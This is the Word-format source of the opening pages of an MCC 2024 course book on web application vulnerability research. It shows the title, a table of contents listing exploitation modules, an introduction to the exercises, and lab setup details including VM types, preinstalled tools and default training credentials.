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F3F68" w14:textId="77777777" w:rsidR="007D7947" w:rsidRDefault="007D7947" w:rsidP="007D7947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8D000F" wp14:editId="7F968EC6">
            <wp:extent cx="5731510" cy="4804410"/>
            <wp:effectExtent l="19050" t="19050" r="21590" b="15240"/>
            <wp:docPr id="1044598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98796" name="Picture 10445987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166D5" w14:textId="77777777" w:rsidR="007D7947" w:rsidRPr="007D7947" w:rsidRDefault="007D7947" w:rsidP="007D7947">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D7947">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>MCC 2024 Presents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535EA0AB" w14:textId="77777777" w:rsidR="007D7947" w:rsidRDefault="007D7947" w:rsidP="007D7947">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc183609073"/>
      <w:r w:rsidRPr="007D7947">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="007D7947">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t xml:space="preserve">eb </w:t>
      </w:r>
      <w:r w:rsidRPr="007D7947">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="007D7947">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t xml:space="preserve">pplication </w:t>
      </w:r>
      <w:r w:rsidRPr="007D7947">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>V</w:t>
      </w:r>
      <w:r w:rsidRPr="007D7947">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t xml:space="preserve">ulnerability </w:t>
      </w:r>
      <w:r w:rsidRPr="007D7947">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidRPr="007D7947">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>esearch</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="2620DCE0" w14:textId="2F3A4DE9" w:rsidR="003E672C" w:rsidRPr="007D7947" w:rsidRDefault="007D7947" w:rsidP="007D7947">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D7947">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>COURSEBOOK</w:t>
      </w:r>
      <w:r w:rsidR="003E672C" w:rsidRPr="007D7947">
        <w:rPr>
          <w:rStyle w:val="Strong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kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:id w:val="-1145501412"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="46904D7C" w14:textId="66D6B299" w:rsidR="003E672C" w:rsidRDefault="003E672C" w:rsidP="00D33E1C">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
            <w:spacing w:line="276" w:lineRule="auto"/>
          </w:pPr>
          <w:r>
            <w:t>Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="55B71764" w14:textId="23191177" w:rsidR="00B330D0" w:rsidRDefault="003E672C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9073" w:history="1">
            <w:r w:rsidR="00B330D0" w:rsidRPr="00500130">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Web Application Vulnerability Research</w:t>
            </w:r>
            <w:r w:rsidR="00B330D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B330D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B330D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc183609073 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B330D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B330D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B330D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00B330D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6C093B5B" w14:textId="2A8E3E63" w:rsidR="00B330D0" w:rsidRDefault="00B330D0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74" w:history="1">
            <w:r w:rsidRPr="00500130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  <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>About this cours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FEB5" w14:textId="3C367936" w:rsidR="00B330D0" w:rsidRDefault="00B330D0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75" w:history="1">
            <w:r w:rsidRPr="00500130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  <w:lang w:val="en-US"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27EB" w14:textId="52690A60" w:rsidR="00B330D0" w:rsidRDefault="00B330D0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76" w:history="1">
            <w:r w:rsidRPr="00500130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  <w:lang w:val="en-U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24C1" w14:textId="34BED070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77" w:history="1">
            <w:r w:rsidRPr="00500130">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>3.1.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  <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Virtual Machin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FDC5" w14:textId="556EC9E9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78" w:history="1">
            <w:r w:rsidRPr="00500130">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>3.2.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  <w:lang w:val="en-US"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3991" w14:textId="69FAB44F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79" w:history="1">
            <w:r w:rsidRPr="00500130">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>3.3.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  <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Starting 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690F" w14:textId="3916BFB9" w:rsidR="00B330D0" w:rsidRDefault="00B330D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80" w:history="1">
            <w:r w:rsidRPr="00500130">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>1.1.1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  <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Prepare the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482D" w14:textId="1D96DADF" w:rsidR="00B330D0" w:rsidRDefault="00B330D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81" w:history="1">
            <w:r w:rsidRPr="00500130">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>1.1.2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  <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Start the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DD8F" w14:textId="13D73BAA" w:rsidR="00B330D0" w:rsidRDefault="00B330D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82" w:history="1">
            <w:r w:rsidRPr="00500130">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>1.1.3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  <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Stop the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906B" w14:textId="2111E846" w:rsidR="00B330D0" w:rsidRDefault="00B330D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83" w:history="1">
            <w:r w:rsidRPr="00500130">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>1.1.4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  <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Clean Up (Option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07B4" w14:textId="2EA824B3" w:rsidR="00B330D0" w:rsidRDefault="00B330D0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84" w:history="1">
            <w:r w:rsidRPr="00500130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  <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Play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4C06" w14:textId="7B1CC8D0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85" w:history="1">
            <w:r w:rsidRPr="00500130">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4.1.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  <w:lang w:val="en-US"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4E88" w14:textId="261BA318" w:rsidR="00B330D0" w:rsidRDefault="00B330D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90" w:history="1">
            <w:r w:rsidRPr="00500130">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.1.1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Laravel Debu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94C5" w14:textId="4C06FEB0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91" w:history="1">
            <w:r w:rsidRPr="00500130">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.2.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Laravel routing &amp;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097B" w14:textId="2928985A" w:rsidR="00B330D0" w:rsidRDefault="00B330D0">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1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92" w:history="1">
            <w:r w:rsidRPr="00500130">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.2.1.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Creat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8B33" w14:textId="0CB09967" w:rsidR="00B330D0" w:rsidRDefault="00B330D0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96" w:history="1">
            <w:r w:rsidRPr="00500130">
              <w:rPr>
                <w:rStyle w:val="Hyperlink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 xml:space="preserve">Module 1 </w:t>
            </w:r>
            <w:r w:rsidRPr="00500130">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>–</w:t>
            </w:r>
            <w:r w:rsidRPr="00500130">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> Arbitrary Fil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035C" w14:textId="218EECAA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97" w:history="1">
            <w:r w:rsidRPr="00500130">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.1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C67A" w14:textId="182045EA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98" w:history="1">
            <w:r w:rsidRPr="00500130">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.2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Investiga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F8EF" w14:textId="53AA89C5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099" w:history="1">
            <w:r w:rsidRPr="00500130">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.3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Vulner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AEA9" w14:textId="14A8044F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00" w:history="1">
            <w:r w:rsidRPr="00500130">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.4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47F5" w14:textId="54F745ED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01" w:history="1">
            <w:r w:rsidRPr="00500130">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.5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758C" w14:textId="69CED189" w:rsidR="00B330D0" w:rsidRDefault="00B330D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02" w:history="1">
            <w:r w:rsidRPr="00500130">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.5.1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Exploi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32C9" w14:textId="22A92B2D" w:rsidR="00B330D0" w:rsidRDefault="00B330D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03" w:history="1">
            <w:r w:rsidRPr="00500130">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.5.2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File upload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01F7" w14:textId="0599D48F" w:rsidR="00B330D0" w:rsidRDefault="00B330D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04" w:history="1">
            <w:r w:rsidRPr="00500130">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.5.3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Other type of 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3C5E" w14:textId="2BEDEA2D" w:rsidR="00B330D0" w:rsidRDefault="00B330D0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05" w:history="1">
            <w:r w:rsidRPr="00500130">
              <w:rPr>
                <w:rStyle w:val="Hyperlink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 xml:space="preserve">Module 2 </w:t>
            </w:r>
            <w:r w:rsidRPr="00500130">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>–</w:t>
            </w:r>
            <w:r w:rsidRPr="00500130">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> Privilege Escalation to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C19C" w14:textId="0F2F24B4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06" w:history="1">
            <w:r w:rsidRPr="00500130">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.1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40E2" w14:textId="74B373EB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07" w:history="1">
            <w:r w:rsidRPr="00500130">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.2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Investiga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F552" w14:textId="0A3EC5F3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08" w:history="1">
            <w:r w:rsidRPr="00500130">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.3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Vulner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0EC1" w14:textId="26507989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09" w:history="1">
            <w:r w:rsidRPr="00500130">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.4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ABED" w14:textId="2B7A0688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10" w:history="1">
            <w:r w:rsidRPr="00500130">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.5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6436" w14:textId="18276790" w:rsidR="00B330D0" w:rsidRDefault="00B330D0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11" w:history="1">
            <w:r w:rsidRPr="00500130">
              <w:rPr>
                <w:rStyle w:val="Hyperlink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 xml:space="preserve">Module 3 </w:t>
            </w:r>
            <w:r w:rsidRPr="00500130">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>–</w:t>
            </w:r>
            <w:r w:rsidRPr="00500130">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> Arbitrary Fil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4B0A" w14:textId="741281D4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12" w:history="1">
            <w:r w:rsidRPr="00500130">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.1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9181" w14:textId="283EA868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13" w:history="1">
            <w:r w:rsidRPr="00500130">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.2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Investigat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D7A8" w14:textId="5C86AA77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14" w:history="1">
            <w:r w:rsidRPr="00500130">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.3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Investiga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210D" w14:textId="69D9F7CE" w:rsidR="00B330D0" w:rsidRDefault="00B330D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15" w:history="1">
            <w:r w:rsidRPr="00500130">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.3.1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Sink to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9B1C" w14:textId="4A85869C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16" w:history="1">
            <w:r w:rsidRPr="00500130">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.4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Vulner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3B2C" w14:textId="6A788670" w:rsidR="00B330D0" w:rsidRDefault="00B330D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17" w:history="1">
            <w:r w:rsidRPr="00500130">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.4.1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Message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AAB9" w14:textId="6C7F6EAC" w:rsidR="00B330D0" w:rsidRDefault="00B330D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18" w:history="1">
            <w:r w:rsidRPr="00500130">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.4.2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User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6DB3" w14:textId="0E6ECE80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19" w:history="1">
            <w:r w:rsidRPr="00500130">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.5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Proof of Concept &amp;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347B" w14:textId="070BFA71" w:rsidR="00B330D0" w:rsidRDefault="00B330D0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20" w:history="1">
            <w:r w:rsidRPr="00500130">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof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Hom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4553" w14:textId="439C11AD" w:rsidR="00B330D0" w:rsidRDefault="00B330D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MY"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc183609121" w:history="1">
            <w:r w:rsidRPr="00500130">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-MY"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="0050013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55E8" w14:textId="7030578B" w:rsidR="003E672C" w:rsidRDefault="003E672C" w:rsidP="00D33E1C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D0E005" w14:textId="59903DAB" w:rsidR="003E672C" w:rsidRDefault="003E672C" w:rsidP="00D33E1C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D9AAD3B" w14:textId="1962BEBA" w:rsidR="00F84414" w:rsidRPr="003E672C" w:rsidRDefault="003E672C" w:rsidP="00D33E1C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc183609074"/>
      <w:r w:rsidRPr="003E672C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>About this course book</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="15587FDA" w14:textId="77777777" w:rsidR="003E672C" w:rsidRPr="003E672C" w:rsidRDefault="003E672C" w:rsidP="00D33E1C">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E672C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This book is meant to provide all the technical details you need about the modules in this class.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D86E1F" w14:textId="136C4BC6" w:rsidR="003E672C" w:rsidRDefault="003E672C" w:rsidP="00D33E1C">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E672C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>We've divided the course into "modules" to make things easier to follow. Each module focuses on a single application for you to explore and analyze.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8D2495" w14:textId="0149F9C0" w:rsidR="003E672C" w:rsidRDefault="003E672C" w:rsidP="00D33E1C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc183609075"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Exercises</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="45547F8D" w14:textId="19816A12" w:rsidR="003E672C" w:rsidRDefault="003E672C" w:rsidP="00D33E1C">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E672C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The exercises are meant to be done in order, so try not to skip ahead before finishing the earlier ones. If possible, give the exercises a shot on your own without seeking help from the instructor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6FDB5B" w14:textId="3A1D3732" w:rsidR="00D27E48" w:rsidRDefault="00D27E48" w:rsidP="00D33E1C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc183609076"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Setup</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="3259BB8B" w14:textId="4B6099C1" w:rsidR="00D27E48" w:rsidRDefault="00D27E48" w:rsidP="00D33E1C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc183609077"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Virtual Machine Information</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="7521DE82" w14:textId="77777777" w:rsidR="00D33E1C" w:rsidRPr="00D33E1C" w:rsidRDefault="00D33E1C" w:rsidP="00D33E1C">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D33E1C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">There are two types of Virtual Machines available:  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608A0339" w14:textId="516E9D14" w:rsidR="00D33E1C" w:rsidRPr="00D33E1C" w:rsidRDefault="00D33E1C" w:rsidP="00D33E1C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n-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D33E1C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Full: Includes all pre-installed Docker images.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644B8B6D" w14:textId="518AB20C" w:rsidR="00D33E1C" w:rsidRPr="00D33E1C" w:rsidRDefault="00D33E1C" w:rsidP="00D33E1C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n-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D33E1C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Slim: </w:t>
      </w:r>
      <w:r w:rsidR="00F117A5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00D33E1C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ithout Docker images or caches.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D06840" w14:textId="77777777" w:rsidR="00174C2D" w:rsidRDefault="00D33E1C" w:rsidP="00D33E1C">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D33E1C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">For the more adventurous participants, we also offer a code-only option. This means you'll need to flex your problem-solving skills to get everything working. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2657B0" w14:textId="07E90E25" w:rsidR="00D33E1C" w:rsidRDefault="00D33E1C" w:rsidP="00D33E1C">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D33E1C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Just a heads-up: minimal assistance will be available for this option! </w:t>
      </w:r>
      <w:r w:rsidRPr="00D33E1C">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>😊</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDE4E18" w14:textId="303DECA6" w:rsidR="00D33E1C" w:rsidRPr="00174C2D" w:rsidRDefault="00D33E1C" w:rsidP="00D33E1C">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI Emoji"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00174C2D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI Emoji"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>By default, all virtual machine come pre-installed with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD8CB26" w14:textId="7741E6B5" w:rsidR="00D33E1C" w:rsidRPr="00174C2D" w:rsidRDefault="00D33E1C" w:rsidP="00D33E1C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Segoe UI Emoji"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00174C2D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI Emoji"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Firefox Browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E07A310" w14:textId="6EFF0623" w:rsidR="00D33E1C" w:rsidRPr="00174C2D" w:rsidRDefault="00D33E1C" w:rsidP="00D33E1C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Segoe UI Emoji"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00174C2D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI Emoji"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sublime Text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6F07F7" w14:textId="34894D98" w:rsidR="00D33E1C" w:rsidRPr="00174C2D" w:rsidRDefault="00D33E1C" w:rsidP="00D33E1C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Segoe UI Emoji"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00174C2D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI Emoji"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Burp Community Edition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706D174B" w14:textId="5B50DC00" w:rsidR="00D33E1C" w:rsidRDefault="00D33E1C" w:rsidP="00D33E1C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc183609078"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Credentials</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="1D641B8A" w14:textId="77777777" w:rsidR="00822827" w:rsidRDefault="008228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241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User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udent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2481504E" w14:textId="77777777" w:rsidR="00822827" w:rsidRDefault="008228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4241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Passwor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mcc2024</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>#@!</w:t>
      </w:r>
    </w:p>
